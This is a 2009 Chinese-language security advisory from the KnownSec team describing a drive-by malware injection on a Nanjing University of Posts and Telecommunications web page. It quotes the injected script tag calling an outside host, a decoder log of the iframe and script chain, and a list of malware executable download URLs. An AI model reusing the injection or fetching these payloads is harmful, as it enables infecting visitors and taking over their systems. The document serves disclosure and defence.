发布时间:Fri Dec 18 2009 20:07:12 UTC+0800
最后更新时间:Fri Dec 18 2009 20:07:12 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 南京邮电大学(http://www.njupt.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://xyh.njupt.edu.cn/

网页被嵌入恶意链接代码:
<script src=http://a.ll8cc.cn></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://xyh.njupt.edu.cn/
    [script]http://a.ll8cc.cn
        [iframe]http://c.8883.ss.la/4/google.htm
            [iframe]http://c.8883.ss.la/4/search.htm
                [script]http://c.8883.ss.la/4/google_ad.js
                    [iframe]http://c.8883.ss.la/4/cqqmp.htm
                        [script]http://c.8883.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/show.jpg
                        [script]http://c.8883.ss.la/4/shows.jpg
                [script]http://c.8883.ss.la/4/google_ads.js
                    [iframe]http://c.8883.ss.la/4/ec1.htm
                        [script]http://c.8883.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyfl.htm
                    [iframe]http://c.8883.ss.la/4/ecof.htm
                        [script]http://c.8883.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fydvd.htm
                    [iframe]http://c.8883.ss.la/4/fycry.htm
                        [script]http://c.8883.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/google_adx.js
                    [iframe]http://c.8883.ss.la/4/cqq0.htm
                        [script]http://c.8883.ss.la/4/cqq2s.css
                        [script]http://c.8883.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecb.htm
                        [iframe]http://c.8883.ss.la/4/ecbbb.htm
                            [script]http://c.8883.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyr.htm
                        [script]http://c.8883.ss.la/4/rr.js
                            [iframe]http://c.8883.ss.la/4/evilr.htm
                                [script]http://c.8883.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://c.8883.ss.la/4/fyre1.htm
                                [script]http://c.8883.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/zz.js
                            [iframe]http://c.8883.ss.la/4/fylz.htm
                                [script]http://c.8883.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecfox.htm
                        [iframe]http://c.8883.ss.la/4/ecffx.htm
                            [script]http://c.8883.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/music.js
                    [iframe]http://c.8883.ss.la/4/sfpf.htm
        [iframe]http://www.sesesemml.cn/?51237957
            [iframe]http://df4554fer.3322.org/xp/360.html?chunjie123
                [iframe]http://df4554fer.3322.org/xp/yt.htm
                    [script]http://df4554fer.3322.org/xp/nop.jpg
                    [script]http://df4554fer.3322.org/xp/ml.jpg
                    [script]http://df4554fer.3322.org/xp/rl.jpg
                        [exe]http://dl7900.3322.org/xp/1.css
                    [script]http://df4554fer.3322.org/xp/kl.jpg
                [iframe]http://df4554fer.3322.org/xp/ytu.htm
                    [iframe]http://df4554fer.3322.org/xp/of.htm
                        [script]http://df4554fer.3322.org/xp/rl.jpg
                        [script]http://df4554fer.3322.org/xp/nop.jpg
                        [script]http://df4554fer.3322.org/xp/fq.jpg
                    [iframe]http://df4554fer.3322.org/xp/yut.htm
                        [iframe]http://df4554fer.3322.org/xp/ytfl1.htm
                [iframe]http://df4554fer.3322.org/xp/t9.htm
                    [script]http://df4554fer.3322.org/xp/rl.jpg
            [script]http://www.sesesemml.cn/dl1.js
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                [script]http://www.sesesemml.cn/images/dl2.js
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
        [iframe]http://a.mmzfc.cn/zz/11.htm?51237957
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
最终下载病毒文件:
http://fuck.ss.la/4.exe
http://dl7900.3322.org/xp/1.css
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:13
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]